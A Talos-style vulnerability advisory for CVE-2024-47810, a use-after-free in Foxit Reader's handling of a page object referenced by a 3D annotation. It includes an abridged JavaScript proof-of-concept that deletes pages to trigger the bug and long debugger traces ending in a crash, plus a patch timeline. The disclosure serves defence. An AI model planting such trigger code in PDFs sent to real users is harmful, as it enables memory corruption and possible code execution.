CVE-2024-47810
A use-after-free vulnerability exists in the way Foxit Reader 2024.3.0.26795 handles a 3D page object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2024.3.0.26795
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a page object contained within a 3D object.. This can be illustrated by the following proof-of-concept code:
function main() {
app.activeDocs[0].layout = "TwoColumnRight";
app.activeDocs[0]["zoom"] = "AAA";
app.activeDocs[0].zoomType = zoomtype.fitW;
app.activeDocs[0].pageNum = 4;
app.activeDocs[0].getField('Text Field0').setFocus();
}
[...]
function page_delete() {
app.activeDocs[0].deletePages(4);
app.activeDocs[0].deletePages();
app.activeDocs[0].addField("AAA", "radiobutton", 0, [107374182,102,5] ) ;
}
In the above code, the page_delete method is invoked when the page number is set to 4 in the main() function. The delete_pages function calls deletePages(), which in turn ends up freeing all objects associated with the page. The use-after-free vulnerability occurs when a page object is freed but its reference within a 3D object is not cleared. Later, this freed object is used without any validation. This behavior can be observed in the debugger (with PageHeap enabled):
0:000> g
eax=0058f5d8 ebx=10098d8c ecx=00000002 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e26e esp=0058f5c0 ebp=0058f630 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
U3DBrowser!PlugInMain+0x1bf0e:
6b97e26e 8945dc mov dword ptr [ebp-24h],eax ss:002b:0058f60c=10098e80
0:000> p
eax=0058f5d8 ebx=10098d8c ecx=00000002 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e271 esp=0058f5c0 ebp=0058f630 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
U3DBrowser!PlugInMain+0x1bf11:
6b97e271 6a64 push 64h
0:000> p
eax=0058f5d8 ebx=10098d8c ecx=00000002 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e273 esp=0058f5bc ebp=0058f630 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
U3DBrowser!PlugInMain+0x1bf13:
6b97e273 c745fc03000000 mov dword ptr [ebp-4],3 ss:002b:0058f62c=ffffffff
0:000> p
eax=0058f5d8 ebx=10098d8c ecx=00000002 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e27a esp=0058f5bc ebp=0058f630 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
U3DBrowser!PlugInMain+0x1bf1a:
6b97e27a ff157cac9e6b call dword ptr [U3DBrowser!PlugInMain+0x8891c (6b9eac7c)] ds:002b:6b9eac7c={mfc140u!operator new (6fb6ee10)} ; <-------- (1)
0:000> p
eax=13a54730 ebx=10098d8c ecx=00000064 edx=00000003 esi=190b8368 edi=ffffffff
eip=6b97e280 esp=0058f5bc ebp=0058f630 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
U3DBrowser!PlugInMain+0x1bf20:
6b97e280 8bf0 mov esi,eax
0:000> dd eax
13a54730 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54740 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54750 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54760 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54770 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54780 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54790 e0e0e0e0 a0a0a0a0 a0a0a0a0 f0f0f0f0
13a547a0 00000000 00000000 e01887ab 0040fda6
When the 3D image of the document is loaded, a method is called call at (1) to create a CArtworkAnnot object of size 0x64. The value of the 3D object can be observed at (2).
0:000> p
eax=13a54730 ebx=10098d8c ecx=13a5473c edx=00000003 esi=13a54730 edi=ffffffff
eip=6b97e2b0 esp=0058f5b8 ebp=0058f630 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
U3DBrowser!PlugInMain+0x1bf50:
6b97e2b0 ff75e4 push dword ptr [ebp-1Ch] ss:002b:0058f614=1909bb18
0:000> p
eax=13a54730 ebx=10098d8c ecx=13a5473c edx=00000003 esi=13a54730 edi=ffffffff
eip=6b97e2b3 esp=0058f5b4 ebp=0058f630 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
U3DBrowser!PlugInMain+0x1bf53:
6b97e2b3 ff75dc push dword ptr [ebp-24h] ss:002b:0058f60c=0058f5d8
0:000> p
eax=13a54730 ebx=10098d8c ecx=13a5473c edx=00000003 esi=13a54730 edi=ffffffff
eip=6b97e2b6 esp=0058f5b0 ebp=0058f630 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
U3DBrowser!PlugInMain+0x1bf56:
6b97e2b6 e885e3ffff call U3DBrowser!PlugInMain+0x1a2e0 (6b97c640) ; <-------- (3)
0:000> dd eax ; <-------------------- (4)
13a54730 6b9ec084 00000001 00000001 e0e0e0e0
13a54740 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54750 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54760 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54770 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54780 e0e0e0e0 e0e0e0e0 e0e0e0e0 e0e0e0e0
13a54790 e0e0e0e0 a0a0a0a0 a0a0a0a0 f0f0f0f0
13a547a0 00000000 00000000 e01887ab 0040fda6
0:000> p
eax=13a5473c ebx=10098d8c ecx=fff7993f edx=0c55c950 esi=13a54730 edi=ffffffff
eip=6b97e2bb esp=0058f5c0 ebp=0058f630 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
U3DBrowser!PlugInMain+0x1bf5b:
6b97e2bb eb02 jmp U3DBrowser!PlugInMain+0x1bf5f (6b97e2bf)
0:000> dd eax ; <-------------------- (5)
13a5473c 6b9ebfe4 00000000 00000000 00000001
13a5474c 1909bb18 1909d950 190b8368 00000000
13a5475c e0e0e000 10098d8c 10098d80 00000000
13a5476c 00000000 00000002 00000002 00000000
13a5477c 00000001 00000000 00000120 000000d8
At (3), a method is called to initialize the 3D object. The value of the 3D buffer is examined at (4) and (5), showing the values before and after initialization. At offset 0x10 of the buffer, it contains a reference to a page object with the value 0x1909bb18. This page object is freed when the deletePages method is called.
0:000> g
eax=0058e768 ebx=0058e7d4 ecx=0306eef0 edx=00000002 esi=136f96f8 edi=1583b540
eip=03413e79 esp=0058e740 ebp=0058e780 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x11ffcd0 (0306eef0)}
0:000> g
ModLoad: 6aa60000 6adc5000 C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
eax=0058e768 ebx=0058e7d4 ecx=0306eef0 edx=00000002 esi=15a60188 edi=13da3cc0
eip=03413e79 esp=0058e740 ebp=0058e780 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
FoxitPDFReader!FXJSE_GetClass+0x269:
03413e79 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x11ffcd0 (0306eef0)} ; <--------------- (6)
[...]
0:000>
eax=00000001 ebx=15e40460 ecx=6f99f197 edx=00000001 esi=1909bb18 edi=15e40460
eip=00c0a5bb esp=0058e588 ebp=0058e5b0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb61b:
00c0a5bb 56 push esi ; <--------------- (7)
0:000> p
eax=00000001 ebx=15e40460 ecx=6f99f197 edx=00000001 esi=1909bb18 edi=15e40460
eip=00c0a5bc esp=0058e584 ebp=0058e5b0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb61c:
00c0a5bc e89fcb8201 call FoxitPDFReader!safe_vsnprintf+0x5c7f40 (02437160) ; <--------------- (8)
0:000> dd esi ; <--------------- (9)
1909bb18 19092e30 00000000 0c566458 19092e60
1909bb28 19092e60 00000000 44190000 00000000
1909bb38 44460000 00000000 44190000 00000000
1909bb48 44460000 00000300 00000000 00000000
1909bb58 15e93228 00000000 00000000 00000000
1909bb68 00000000 00000000 00000000 00000000
1909bb78 00000080 00000000 00000000 00000100
1909bb88 00000000 00000000 00000001 ffffffff
0:000> p
eax=00000000 ebx=15e40460 ecx=6f99f16b edx=002d6000 esi=1909bb18 edi=15e40460
eip=00c0a5c1 esp=0058e584 ebp=0058e5b0 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb621:
00c0a5c1 83c404 add esp,4
0:000> dd esi ; <--------------- (10)
1909bb18 00000000 00000000 0c566458 19092e60
1909bb28 19092e60 00000000 44190000 00000000
1909bb38 44460000 00000000 44190000 00000000
1909bb48 44460000 00000300 00000000 00000000
1909bb58 15e93228 00000000 00000000 00000000
1909bb68 00000000 00000000 00000000 00000000
1909bb78 00000080 00000000 00000000 00000100
1909bb88 00000000 00000000 00000001 ffffffff
0:000> KB L6
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0058e5b0 00bead8d 6f99f1cf 15b03480 15b034b4 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb621
01 0058e5d8 00bd028a 136edf48 6f99f21b 10cf3144 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xcbded
02 0058e60c 00bd7cf6 6f99f267 1908f320 00000001 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xb12ea
03 0058e670 00bd7fbd 15b03480 00000000 0058e68c FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xb8d56
04 0058e680 013ed0d1 0058e6a8 0058e6e4 030a69ac FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xb901d
05 0058e68c 030a69ac 0058e6a8 6f99f2f3 13da3cc0 FoxitPDFReader!CryptUIWizExport+0x30c51
At (6), the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. This subsequently calls the destructor method on the CReader_Page object. The destructor method invokes operator_delete at (8) on the vulnerable object. At (7), the argument for the operator_delete method is pushed onto the stack, coming from the esi register. The value of the vulnerable object is examined at (9) and (10), showing the values before and after the operator_delete method is called. Note that the Foxit application uses a custom allocator, so PageHeap is not able to mark the vulnerable buffer page.
0:000> g
eax=10cf3130 ebx=0058f474 ecx=100bdd90 edx=0c55cec0 esi=13780504 edi=75516140
eip=6b9730be esp=0058f3c4 ebp=0058f468 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
U3DBrowser!PlugInMain+0x10d5e:
6b9730be 8b55dc mov edx,dword ptr [ebp-24h] ss:002b:0058f444=13a5473c
0:000> p
eax=10cf3130 ebx=0058f474 ecx=100bdd90 edx=13a5473c esi=13780504 edi=75516140
eip=6b9730c1 esp=0058f3c4 ebp=0058f468 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
U3DBrowser!PlugInMain+0x10d61:
6b9730c1 8bc8 mov ecx,eax
0:000> p
eax=10cf3130 ebx=0058f474 ecx=10cf3130 edx=13a5473c esi=13780504 edi=75516140
eip=6b9730c3 esp=0058f3c4 ebp=0058f468 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
U3DBrowser!PlugInMain+0x10d63:
6b9730c3 ff7214 push dword ptr [edx+14h] ds:002b:13a54750=1909d950
0:000> p
eax=10cf3130 ebx=0058f474 ecx=10cf3130 edx=13a5473c esi=13780504 edi=75516140
eip=6b9730c6 esp=0058f3c0 ebp=0058f468 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
U3DBrowser!PlugInMain+0x10d66:
6b9730c6 8b5210 mov edx,dword ptr [edx+10h] ds:002b:13a5474c=1909bb18 ; <--------------- (11)
0:000> p
eax=10cf3130 ebx=0058f474 ecx=10cf3130 edx=1909bb18 esi=13780504 edi=75516140
eip=6b9730c9 esp=0058f3c0 ebp=0058f468 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
U3DBrowser!PlugInMain+0x10d69:
6b9730c9 e8d2d60100 call U3DBrowser!PlugInMain+0x2e440 (6b9907a0) ; <--------------- (12)
0:000> p
0:000> dd edx
1909bb18 2e300a71 30203537 2035372e 35372e30
1909bb28 0a677220 38363335 36333037 20313520
1909bb38 33350a6d 30373836 37203633 31362e38
1909bb48 33352034 30373836 31203036 35203130
1909bb58 37383633 20383830 20313031 33350a63
1909bb68 31373836 31203631 35203130 37383633
1909bb78 20303431 362e3837 35203431 37383633
1909bb88 20303431 63203135 3633350a 34313738
At (11), the CArtworkAnnot object still contains a reference to the freed page object. This reference was not cleared or updated in the 3D object after the delete operation. Note that the vulnerable buffer at 0x1909bb18 has been reassigned to another object. The vulnerable buffer is passed as a this pointer to a method at (12). The crash occurs when the this pointer is dereferenced without any validation.
0:000> p
(1c34.1c2c): Access violation - code c0000005 (!!! second chance !!!)
eax=2e300a71 ebx=1909bb18 ecx=100b6248 edx=0c558e30 esi=10cf3130 edi=75516140
eip=01ee5696 esp=0058f3a0 ebp=0058f3a0 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212
FoxitPDFReader!safe_vsnprintf+0x76476:
01ee5696 8b4008 mov eax,dword ptr [eax+8] ds:002b:2e300a79=???????? <------------ (13)
0:000> dd eax
2e300a71 ???????? ???????? ???????? ????????
2e300a81 ???????? ???????? ???????? ????????
2e300a91 ???????? ???????? ???????? ????????
2e300aa1 ???????? ???????? ???????? ????????
2e300ab1 ???????? ???????? ???????? ????????
2e300ac1 ???????? ???????? ???????? ????????
2e300ad1 ???????? ???????? ???????? ????????
2e300ae1 ???????? ???????? ???????? ????????
0:000> dd 1909bb18
1909bb18 2e300a71 30203537 2035372e 35372e30
1909bb28 0a677220 38363335 36333037 20313520
1909bb38 33350a6d 30373836 37203633 31362e38
1909bb48 33352034 30373836 31203036 35203130
1909bb58 37383633 20383830 20313031 33350a63
1909bb68 31373836 31203631 35203130 37383633
1909bb78 20303431 362e3837 35203431 37383633
1909bb88 20303431 63203135 3633350a 34313738
0:000> u
FoxitPDFReader!safe_vsnprintf+0x76476:
01ee5696 8b4008 mov eax,dword ptr [eax+8]
01ee5699 5d pop ebp
01ee569a c3 ret
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0058f3a0 6b990820 2e300a71 13780504 0058f474 FoxitPDFReader!safe_vsnprintf+0x76476
01 0058f3b8 6b9730ce 1909d950 fff798ff 75516140 U3DBrowser!PlugInMain+0x2e4c0
02 0058f468 6b9ce06c 0058f530 00000000 6b9ce06c U3DBrowser!PlugInMain+0x10d6e
03 0058f530 6b9cdcf5 fff799cf ffffffff 1009b3d8 U3DBrowser!PlugInMain+0x6bd0c
04 0058f558 6b9c49e8 13780504 137804f8 10098d8c U3DBrowser!PlugInMain+0x6b995
05 0058f570 6b97ec71 fff79927 ffffffff 13a54730 U3DBrowser!PlugInMain+0x62688
06 0058f5b0 6b97e3e7 13780504 137804f8 fff79aa7 U3DBrowser!PlugInMain+0x1c911
07 0058f630 6b9d3d1b 10ddcda8 1373d788 10cf3130 U3DBrowser!PlugInMain+0x1c087
08 0058f674 6b9bd6c5 10cf3130 10ddcda8 1373d788 U3DBrowser!PlugInMain+0x719bb
09 0058f6b0 6fb38b00 1185d3a8 1373d788 7f186e97 U3DBrowser!PlugInMain+0x5b365
0a 0058f780 6fbd1a7d 00000bc8 1185d3a8 1373d788 mfc140u!CWnd::OnWndMsg+0x795 [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp @ 2695]
0b 0058f7a4 6fbd13a2 00000bc8 1185d3a8 1373d788 mfc140u!CWnd::WindowProc+0x2c [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp @ 2099]
0c 0058f81c 6fb3861b 6ba0a020 000704b6 00000bc8 mfc140u!AfxCallWndProc+0xb8 [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp @ 268]
0d 0058f83c 6fb385ba 000704b6 00000bc8 1185d3a8 mfc140u!AfxWndProc+0x46 [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp @ 416]
0e (Inline) -------- -------- -------- -------- mfc140u!AFX_MAINTAIN_STATE2::{dtor} [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp @ 99]
0f 0058f878 7552171b 000704b6 00000bc8 1185d3a8 mfc140u!AfxWndProcBase+0x34 [f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxstate.cpp @ 299]
10 0058f8a4 75517e8a 6fb38580 000704b6 00000bc8 USER32!_InternalCallWinProc+0x2b
11 0058f98c 75517646 6fb38580 00000000 00000bc8 USER32!UserCallWinProcCheckWow+0x33a
12 0058f9c4 75515e6b 00000bc8 1185d3a8 1373d788 USER32!CallWindowProcAorW+0x7f
13 0058f9dc 0441cff7 6fb38580 000704b6 00000bc8 USER32!CallWindowProcW+0x1b
14 0058fa60 7552171b 000704b6 00000bc8 1185d3a8 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x5f0ea7
15 0058fa8c 75517e8a 0441ceda 000704b6 00000bc8 USER32!_InternalCallWinProc+0x2b
16 0058fb74 755167c1 0441ceda 00000000 00000bc8 USER32!UserCallWinProcCheckWow+0x33a
17 0058fbf0 755162e0 00000ac8 0058fc18 00d034e4 USER32!DispatchMessageWorker+0x4d1
18 0058fbfc 00d034e4 0c5e9b48 0c5e9b48 05f69798 USER32!DispatchMessageW+0x10
19 0058fc18 00d035a3 05f69798 00d03510 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1e4544
1a 0058fc38 0484a70a 00000000 05f956ac 002d3000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1e4603
1b 0058fc50 045ff41a 00910000 00000000 0c5853c4 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0xa1e5ba
1c 0058fc9c 74fbfcc9 002d3000 74fbfcb0 0058fd08 FoxitPDFReader!AUILib::SkinManagerColor::SetDefaultColor+0x7d32ca
1d 0058fcac 770a809e 002d3000 e4cdb485 00000000 KERNEL32!BaseThreadInitThunk+0x19
1e 0058fd08 770a806e ffffffff 770c910a 00000000 ntdll!__RtlUserThreadStart+0x2f
1f 0058fd18 00000000 045ff4e9 002d3000 00000000 ntdll!_RtlUserThreadStart+0x1b
The crash occurs at (13) when the virtual table of the this pointer is dereferenced. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could potentially be exploited to achieve arbitrary code execution.
2024-10-24 - Vendor Disclosure
2024-12-17 - Vendor Patch Release
2024-12-18 - Public Release
Discovered by KPC of Cisco Talos.